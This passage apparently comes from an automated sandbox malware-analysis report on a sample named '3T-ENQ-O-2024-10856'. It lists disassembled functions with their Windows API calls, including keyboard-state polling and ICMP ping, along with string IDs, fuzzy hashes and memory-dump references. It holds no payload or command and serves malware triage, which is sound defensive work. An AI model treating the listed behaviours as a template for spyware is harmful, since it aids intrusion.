                                • Opcode ID: 1a4ee252d5c199f715ce343ae9682cd0a7f41a45efc2428bc28a3ba976c952d5
                                • Instruction ID: e3b39c39890c6aac63ab2193a389cfe8fa0b9bb173b87f5a6fbd30fc8160fed0
                                • Opcode Fuzzy Hash: 1a4ee252d5c199f715ce343ae9682cd0a7f41a45efc2428bc28a3ba976c952d5
                                • Instruction Fuzzy Hash: DE112431908116AFDB24AB70DC4AFEF73ACEF42728F040166F41A96091EF70DB8197A5
                                Function 00CB08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                • String ID:
                                • API String ID: 3566271842-0
                                • Opcode ID: 7696523b5c99a8a91c5b1a8aca5760d60dea87cced75c38d77ef20e5ed468f4d
                                • Instruction ID: 7e22b87c89e40230d27a0c24219e2cbf978898f467580ba6e1e47bb6be5704e5
                                • Opcode Fuzzy Hash: 7696523b5c99a8a91c5b1a8aca5760d60dea87cced75c38d77ef20e5ed468f4d
                                • Instruction Fuzzy Hash: 06715E75900219AFDB10EFA4C888ADEB7B8FF48314F148495E919EB251DB30EE41DF94
                                Function 00CA388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00CA3908
                                • SetKeyboardState.USER32(?), ref: 00CA3973
                                • GetAsyncKeyState.USER32(000000A0), ref: 00CA3993
                                • GetKeyState.USER32(000000A0), ref: 00CA39AA
                                • GetAsyncKeyState.USER32(000000A1), ref: 00CA39D9
                                • GetKeyState.USER32(000000A1), ref: 00CA39EA
                                • GetAsyncKeyState.USER32(00000011), ref: 00CA3A16
                                • GetKeyState.USER32(00000011), ref: 00CA3A24
                                • GetAsyncKeyState.USER32(00000012), ref: 00CA3A4D
                                • GetKeyState.USER32(00000012), ref: 00CA3A5B
                                • GetAsyncKeyState.USER32(0000005B), ref: 00CA3A84
                                • GetKeyState.USER32(0000005B), ref: 00CA3A92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: b39361c2e6dd0bfd2c9f4f1447d9ee6145fb3ed9b1ba53b26b903e7c2354cea3
                                • Instruction ID: 27a3225274c8a6644d96a0932dab3eec76de44e421ab5381e071b81ea39c3c51
                                • Opcode Fuzzy Hash: b39361c2e6dd0bfd2c9f4f1447d9ee6145fb3ed9b1ba53b26b903e7c2354cea3
                                • Instruction Fuzzy Hash: 4151FA30A047D669FB35EBF488217EAAFB45F03348F08458EE5D25A1C2DA949F8CD761
                                Function 00C9FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,00000001), ref: 00C9FB19
                                • GetWindowRect.USER32(00000000,?), ref: 00C9FB2B
                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C9FB89
                                • GetDlgItem.USER32(?,00000002), ref: 00C9FB94
                                • GetWindowRect.USER32(00000000,?), ref: 00C9FBA6
                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C9FBFC
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9FC0A
                                • GetWindowRect.USER32(00000000,?), ref: 00C9FC1B
                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C9FC5E
                                • GetDlgItem.USER32(?,000003EA), ref: 00C9FC6C
                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C9FC89
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9FC96
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ItemMoveRect$Invalidate
                                • String ID:
                                • API String ID: 3096461208-0
                                • Opcode ID: acd72deb6b5296702684ffa7ac44df342e65feb8b328e6bacdd7d8ea05ff56cd
                                • Instruction ID: 2ea48c4524d4c3d3e10e42002deab48c35175f553695fd61a698890eaf35e94c
                                • Opcode Fuzzy Hash: acd72deb6b5296702684ffa7ac44df342e65feb8b328e6bacdd7d8ea05ff56cd
                                • Instruction Fuzzy Hash: 3B51F171B00209AFDF18CF69DD99B6EBBBAEB88711F14853DB916D7290D7709E018B10
                                Function 00C7B86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C64954,00000000), ref: 00C64A23
                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C7B85B), ref: 00C7B926
                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00C7B9BD
                                • DestroyAcceleratorTable.USER32(00000000), ref: 00CDE775
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7A6
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7BD
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7D9
                                • DeleteObject.GDI32(00000000), ref: 00CDE7EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                • String ID:
                                • API String ID: 641708696-0
                                • Opcode ID: f8e3a4f5c074caa083294d7cdd8377b774671cd849ced4235ea9775d956edbc4
                                • Instruction ID: 3887aea353dfb6b8b0edf9c317c873b8175b0ad7be18f321e2d928b61425ac61
                                • Opcode Fuzzy Hash: f8e3a4f5c074caa083294d7cdd8377b774671cd849ced4235ea9775d956edbc4
                                • Instruction Fuzzy Hash: 1461AE39500701EFDB35AF15D8C8B29B7F5FF65311F14851AE2AA8A7A0C770AD82EB50
                                Function 00C7B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7B155: GetWindowLongW.USER32(?,000000EB), ref: 00C7B166
                                • GetSysColor.USER32(0000000F), ref: 00C7B067
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ColorLongWindow
                                • String ID:
                                • API String ID: 259745315-0
                                • Opcode ID: 9a62e7ca7950666e0239e23d414c99f735358afa6d095ebe37f682b8235cf906
                                • Instruction ID: 4c662e7db850cd3536a9dfae8935413576613a9e9182b355115f751b5a9b8951
                                • Opcode Fuzzy Hash: 9a62e7ca7950666e0239e23d414c99f735358afa6d095ebe37f682b8235cf906
                                • Instruction Fuzzy Hash: 4041A071100544AFDB206F28DC88BBE3B66AB46731F188265FE7A8E2E1D7318D41DB21
                                Function 00CA7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                • String ID:
                                • API String ID: 136442275-0
                                • Opcode ID: 4c1515e611a5ec80c56a8bbc69ae49833f703a11d92f95cef54ea8698e3005a7
                                • Instruction ID: 676dc7a4b228e2163623655a0aae13711ff7ed4001789eb40e617df759ec4ffe
                                • Opcode Fuzzy Hash: 4c1515e611a5ec80c56a8bbc69ae49833f703a11d92f95cef54ea8698e3005a7
                                • Instruction Fuzzy Hash: 31412FB280412CAACF21EB50CC45EDE73BCBB09314F0441E6F919A2051EB34ABD4DFA4
                                Function 00C684A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                • __swprintf.LIBCMT ref: 00C684E5
                                • __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C82177: _xtow@16.LIBCMT ref: 00C82198
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __itow__swprintf_xtow@16
                                • String ID: %.15g$0x%p$False$True
                                • API String ID: 1502193981-2263619337
                                • Opcode ID: d890ab7a5ea67ed8e85cf70f500f63117b7691d6ea8292e660b8476f3a3b2e51
                                • Instruction ID: a953dcb81d4cbd961a6b53fce328c6e80a11fc10d4dd385a4d94a93e4ff23a8c
                                • Opcode Fuzzy Hash: d890ab7a5ea67ed8e85cf70f500f63117b7691d6ea8292e660b8476f3a3b2e51
                                • Instruction Fuzzy Hash: 8D412871500605AFDB34EF38D881E7A73E9BF48310F30445EE55AD7291EE319A45EB20
                                Function 00C85C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00C85CCA
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __gmtime64_s.LIBCMT ref: 00C85D63
                                • __gmtime64_s.LIBCMT ref: 00C85D99
                                • __gmtime64_s.LIBCMT ref: 00C85DB6
                                • __allrem.LIBCMT ref: 00C85E0C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E28
                                • __allrem.LIBCMT ref: 00C85E3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E5D
                                • __allrem.LIBCMT ref: 00C85E74
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E92
                                • __invoke_watson.LIBCMT ref: 00C85F03
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                • Instruction ID: 3b47e44fa226ea5dbcca9a876c29668332650fd10b29302f7b908aad477b4c49
                                • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                • Instruction Fuzzy Hash: 3D71E871E01B16BBDB14BF78CC85B6A73A8AF14728F14413AF810E7681E7B4DB409B95
                                Function 00CA57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CA5816
                                • GetMenuItemInfoW.USER32(00D218F0,000000FF,00000000,00000030), ref: 00CA5877
                                • SetMenuItemInfoW.USER32(00D218F0,00000004,00000000,00000030), ref: 00CA58AD
                                • Sleep.KERNEL32(000001F4), ref: 00CA58BF
                                • GetMenuItemCount.USER32(?), ref: 00CA5903
                                • GetMenuItemID.USER32(?,00000000), ref: 00CA591F
                                • GetMenuItemID.USER32(?,-00000001), ref: 00CA5949
                                • GetMenuItemID.USER32(?,?), ref: 00CA598E
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA59D4
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA59E8
                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA5A09
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                • String ID:
                                • API String ID: 4176008265-0
                                • Opcode ID: f1be9e4caecf5717e9084fa1c66a17ba735f75fe3f2abb2780b79c409dad0871
                                • Instruction ID: 2cb86e81ee49d01600b16aba339cef2b5452ecff7805e889ba4534a27255e7e1
                                • Opcode Fuzzy Hash: f1be9e4caecf5717e9084fa1c66a17ba735f75fe3f2abb2780b79c409dad0871
                                • Instruction Fuzzy Hash: E061A57190068AEFDB11CF64D988ABF7BB8FB0631CF148159E452AB291D7319E46DB20
                                Function 00CC9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC9AA5
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC9AA8
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC9ACC
                                • _memset.LIBCMT ref: 00CC9ADD
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC9AEF
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC9B67
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow_memset
                                • String ID:
                                • API String ID: 830647256-0
                                • Opcode ID: 139e480a6d1db77fa2b5d2ac03874f9229457ddb364ca6590a079c6ea3f246d7
                                • Instruction ID: 76573d933f4f2e842f2b00b51927efa052af1568d1bebec8df06204a886970f1
                                • Opcode Fuzzy Hash: 139e480a6d1db77fa2b5d2ac03874f9229457ddb364ca6590a079c6ea3f246d7
                                • Instruction Fuzzy Hash: 0D616975A00208AFDB20DFA4CC85FEEB7B8EB19704F104159FA15E7291D770AE46DB60
                                Function 00CA3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00CA3591
                                • GetAsyncKeyState.USER32(000000A0), ref: 00CA3612
                                • GetKeyState.USER32(000000A0), ref: 00CA362D
                                • GetAsyncKeyState.USER32(000000A1), ref: 00CA3647
                                • GetKeyState.USER32(000000A1), ref: 00CA365C
                                • GetAsyncKeyState.USER32(00000011), ref: 00CA3674
                                • GetKeyState.USER32(00000011), ref: 00CA3686
                                • GetAsyncKeyState.USER32(00000012), ref: 00CA369E
                                • GetKeyState.USER32(00000012), ref: 00CA36B0
                                • GetAsyncKeyState.USER32(0000005B), ref: 00CA36C8
                                • GetKeyState.USER32(0000005B), ref: 00CA36DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 5b722d01231681257a39bf2ce8c90884ab8171a18fb670f892d92c6e76c3684d
                                • Instruction ID: 793004a1b759b9f68ea8c5bcf96de2e042f39875507f353a11c2e23eafbca858
                                • Opcode Fuzzy Hash: 5b722d01231681257a39bf2ce8c90884ab8171a18fb670f892d92c6e76c3684d
                                • Instruction Fuzzy Hash: FA4198649047CB7DFF319B6489243B5BEA07B1334CF044059F5D64A2C1EBA49BC8CB62
                                Function 00C9A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00C9A2AA
                                • SafeArrayAllocData.OLEAUT32(?), ref: 00C9A2F5
                                • VariantInit.OLEAUT32(?), ref: 00C9A307
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C9A327
                                • VariantCopy.OLEAUT32(?,?), ref: 00C9A36A
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C9A37E
                                • VariantClear.OLEAUT32(?), ref: 00C9A393
                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00C9A3A0
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9A3A9
                                • VariantClear.OLEAUT32(?), ref: 00C9A3BB
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9A3C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 507f76d843f0f461448fdb4a99197cf9287d163af91a0f97f91aa65a6bb0e78a
                                • Instruction ID: a115320e0d4f67034cb79b74549c03bd1b81f27960397cbf70b190a9b4f54caa
                                • Opcode Fuzzy Hash: 507f76d843f0f461448fdb4a99197cf9287d163af91a0f97f91aa65a6bb0e78a
                                • Instruction Fuzzy Hash: 81411D31900219AFCF01DFA4DC88ADEBBB9FF48344F008065F556A72A1DB35EA45DBA1
                                Function 00CBB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • CoInitialize.OLE32 ref: 00CBB298
                                • CoUninitialize.OLE32 ref: 00CBB2A3
                                • CoCreateInstance.OLE32(?,00000000,00000017,00CED8FC,?), ref: 00CBB303
                                • IIDFromString.OLE32(?,?), ref: 00CBB376
                                • VariantInit.OLEAUT32(?), ref: 00CBB410
                                • VariantClear.OLEAUT32(?), ref: 00CBB471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 834269672-1287834457
                                • Opcode ID: a3cd99c24e9004e4a4cb1da102c8502b8a610d35c32643e79586608b640ce367
                                • Instruction ID: d5216e06d112583e2a6b81a2999f9a921770c7d38612fcc3f0b8985bfeba1f3f
                                • Opcode Fuzzy Hash: a3cd99c24e9004e4a4cb1da102c8502b8a610d35c32643e79586608b640ce367
                                • Instruction Fuzzy Hash: 5461B170204711AFC710DF55C889BAEB7E8AF49714F04451DF9969B2A1CBB0EE48CB92
                                Function 00CB8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 00CB86F5
                                • inet_addr.WSOCK32(?,?,?), ref: 00CB873A
                                • gethostbyname.WSOCK32(?), ref: 00CB8746
                                • IcmpCreateFile.IPHLPAPI ref: 00CB8754
                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB87C4
                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB87DA
                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CB884F
                                • WSACleanup.WSOCK32 ref: 00CB8855
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                • String ID: Ping
                                • API String ID: 1028309954-2246546115
                                • Opcode ID: fcf8f6228994f831cde103ec72b491c052fb3735ad9f894420a60e17927cf89a
                                • Instruction ID: 5d852c937ee6bb0cb7c022cd1dd4ae91d8cce30890a6579b30a2a5fa5bc4d5a3
                                • Opcode Fuzzy Hash: fcf8f6228994f831cde103ec72b491c052fb3735ad9f894420a60e17927cf89a
                                • Instruction Fuzzy Hash: 195181316042019FD720EF25CC85B6E7BE8EB48724F148529F566EB2E1DF31E905DB51
